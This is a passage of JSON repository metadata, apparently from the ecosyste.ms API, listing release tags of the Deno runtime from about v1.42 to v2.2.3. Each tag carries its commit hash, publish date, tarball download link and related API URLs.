7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/